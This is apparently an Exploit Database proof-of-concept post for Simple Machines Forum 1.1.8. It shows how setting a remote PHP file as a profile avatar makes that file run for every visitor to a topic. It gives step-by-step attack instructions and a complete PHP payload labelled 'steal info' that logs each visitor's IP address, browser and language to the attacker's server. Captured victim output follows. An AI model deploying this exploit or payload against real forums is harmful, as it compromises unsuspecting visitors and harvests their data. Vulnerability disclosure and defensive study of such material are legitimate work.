Simple Machines Forum (SMF) 1.1.8 – ‘avatar’ Remote PHP File Execute

• Exploit Database
• 13 阅读

• 作者： JosS
  日期： 2010-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11905/

• Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC
  bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
  
  contact: sys-project[at]hotmail.com
  website: http://www.hack0wn.com/
  
  - About Vulnerability:
  
  This vulnerability allow execute a php external file in any visitor of the forum.
  The php file should have the malicious code.
  The scope of the attack depends on the strength of the php file.
  
  - Step by Step:
  
  1) go to your profile in section of avatar.
  2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
  3) create a new topic.
  
  - [victims] All the people that visit the topic will be infect.
  
  
  malicious file example [steal info]: (poc.php)
  
  <?php
  $ip = $_SERVER['REMOTE_ADDR'];
  $so= $_SERVER['HTTP_USER_AGENT'];
  $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
  $url= $_SERVER['PHP_SELF'];
  $path= $_SERVER['DOCUMENT_ROOT'];
  $archivo = 'hacks.txt';
  $fp = fopen($archivo, "a");
  $string = "
  Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
  by Jose Luis Gongora Fernandez (aka) JosS
  
  $path$url
  
  VICTIM: $ip
  
  info: $so
  language: $lan
  
  
  ";
  $write = fputs($fp, $string);
  fclose($fp);
  ?>
  ------END-----
  
  cat hacks.txt
  
  Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
  by Jose Luis Gongora Fernandez (aka) JosS
  
  /***/***/vhosts/hack0wn.com/httpdocs/poc.php
  
  VICTIM: 88.25.92.***
  
  info: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.19) Gecko/20081202 Iceweasel/2.0.0.19 (Debian-2.0.0.19-0etch1)
  language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
  
  
  // tested on smf 1.1.8
  
  
  __h0__
  ________________________________
  ¿Sabes que la Videollamada de Messenger es GRATIS ¡Descúbrela!<http://events.es.msn.com/windows-live/redes-sociales/default.aspx>